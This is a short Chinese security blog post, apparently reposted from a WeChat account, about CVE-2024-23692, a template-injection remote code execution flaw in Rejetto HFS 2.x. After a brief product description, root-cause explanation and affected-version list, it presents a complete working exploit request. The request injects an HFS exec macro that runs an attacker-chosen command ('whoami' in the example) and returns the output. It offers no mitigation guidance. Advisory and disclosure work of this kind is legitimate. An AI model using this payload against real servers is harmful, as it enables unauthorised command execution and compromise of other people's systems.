CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

admin 2024年6月14日17:51:56评论31 views字数 1105阅读3分41秒阅读模式
0x00 前言

HFS(HTTP File Server)是一个基于HTTP协议的文件服务器软件,允许用户通过浏览器访问和共享计算机上的文件。HFS的起源可以追溯到2002年,由Rejetto开发并发布。

HFS的主要特点包括界面简洁直观、易于安装和配置、支持虚拟文件系统、支持多种权限设置等。通过HFS,用户可以轻松地在本地网络或互联网上共享文件和文件夹,无需安装额外的软件,只需使用一个支持HTTP协议的浏览器即可访问和下载文件。
0x01 漏洞描述

根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。

此模板包含来自请求的搜索查询参数的内容,该内容未正确转义,从而启用了 SSTI 在正常操作下,符号和宏会被编码以防止 SSTI。但是,通过强制服务器取消转义某些字符,攻击者可以将任意宏注入模板。

0x02 CVE编号

CVE-2024-23692

0x03 影响版本

Rejetto HFS 2.x

0x04 漏洞详情

POC:

GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: HFS_SID_=0.590236319694668

CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

0x05 参考链接

https://github.com/rapid7/metasploit-framework/pull/19240

https://www.rejetto.com/hfs/?f=dl

原文始发于微信公众号(信安百科):CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月14日17:51:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)https://cn-sec.com/archives/2849429.html

发表评论

匿名网友 填写信息